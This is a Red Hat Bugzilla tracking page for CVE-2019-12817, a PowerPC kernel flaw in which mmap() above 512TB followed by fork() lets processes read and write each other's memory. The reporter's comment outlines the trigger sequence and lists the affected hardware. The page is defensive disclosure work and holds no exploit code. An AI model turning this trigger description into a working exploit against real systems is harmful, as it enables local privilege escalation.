Bug 1720616 (CVE-2019-12817) - CVE-2019-12817 kernel: ppc: unrelated processes being able to read/write to each other's virtual memory
Summary: CVE-2019-12817 kernel: ppc: unrelated processes being able to read/write to e...
Keywords:
Status: NEW
Alias: CVE-2019-12817
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=important,public=20190624,repo...
: 1720341 (view as bug list)
Depends On: 1723323 1723324 1723697
Blocks: 1723808 1720619 1734689
TreeView+ depends on / blocked
 
Reported: 2019-06-14 11:20 UTC by msiddiqu
Modified: 2019-09-16 21:54 UTC (History)
47 users (show)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in the way the Linux kernel's memory subsystem on certain 64-bit PowerPCs with the hash page table MMU handled memory above 512TB. A local, unprivileged user could use this flaw to escalate their privileges on the system.
Clone Of:
Environment:
Last Closed:


Attachments (Terms of Use)


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHBA-2019:2767 None None None 2019-09-12 19:12:36 UTC
Red Hat Product Errata RHSA-2019:2703 None None None 2019-09-10 19:00:22 UTC

Description msiddiqu 2019-06-14 11:20:20 UTC
A flaw was found in the way the Linux kernel's memory subsystem on certain
64-bit PowerPC with the hash page table MMU handled memory above 512TB. A local,
unprivileged user could use this flaw to escalate their privileges on the system.

Upstream commit that introduced this issue:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f384796c40dc

Upstream fix:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ca72d88378b2f2444d3ec145dd442d449d3fefbc

Comment 1 Petr Matousek 2019-06-14 12:49:56 UTC
*** Bug 1720341 has been marked as a duplicate of this bug. ***

Comment 2 Petr Matousek 2019-06-24 09:44:02 UTC
Note from the reporter:

This bug only affects machines using 64-bit CPUs with the hash page table MMU,
see below for more detail on affected CPUs.

To trigger the bug a process must allocate memory above 512TB. That only happens
if userspace explicitly requests it with mmap(). That process must then fork(),
at this point the child incorrectly inherits the "context id" of the parent
associated with the mapping above 512TB. It may then be possible for the
parent/child to write to each other's mappings above 512TB, which should not be
possible, and constitutes memory corruption.

If instead the child process exits, all its context ids are freed, including the
context id that is still in use by the parent for the mapping above 512TB. That
id can then be reallocated to a third process, that process can then read/write
to the parent's mapping above 512TB. Additionally if the freed id is used for
the third process's primary context id, then the parent is able to read/write to
the third process's mappings *below* 512TB.

If the parent and child both exit before another process is allocated the freed
context id, the kernel will notice the double free of the id and print a warning
such as:

ida_free called for id=103 which is not allocated.
WARNING: CPU: 8 PID: 7293 at lib/idr.c:520 ida_free_rc+0x1b4/0x1d0

Only machines using the hash page table (HPT) MMU are affected, eg. PowerPC 970
(G5), PA6T, Power5/6/7/8/9. By default Power9 bare metal machines (powernv) use
the Radix MMU and are not affected, unless the machine has been explicitly
booted in HPT mode (using disable_radix on the kernel command line). KVM guests
on Power9 may be affected if the host or guest is configured to use the HPT MMU.
LPARs under PowerVM on Power9 are affected as they always use the HPT MMU.
Kernels built with PAGE_SIZE=4K are not affected.

Comment 3 Petr Matousek 2019-06-24 09:46:09 UTC
Acknowledgments:

Name: Michael Ellerman

Comment 4 Petr Matousek 2019-06-24 09:48:39 UTC
Statement:

Red Hat Product Security is aware of this issue. Updates will be released as they become available.

Comment 8 Marian Rehak 2019-06-25 08:06:05 UTC
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1723697]

Comment 9 Petr Matousek 2019-06-25 09:16:03 UTC
External References:

https://seclists.org/oss-sec/2019/q2/200

Comment 10 errata-xmlrpc 2019-09-10 19:00:20 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2019:2703 https://access.redhat.com/errata/RHSA-2019:2703


Note You need to log in before you can comment on or make changes to this bug.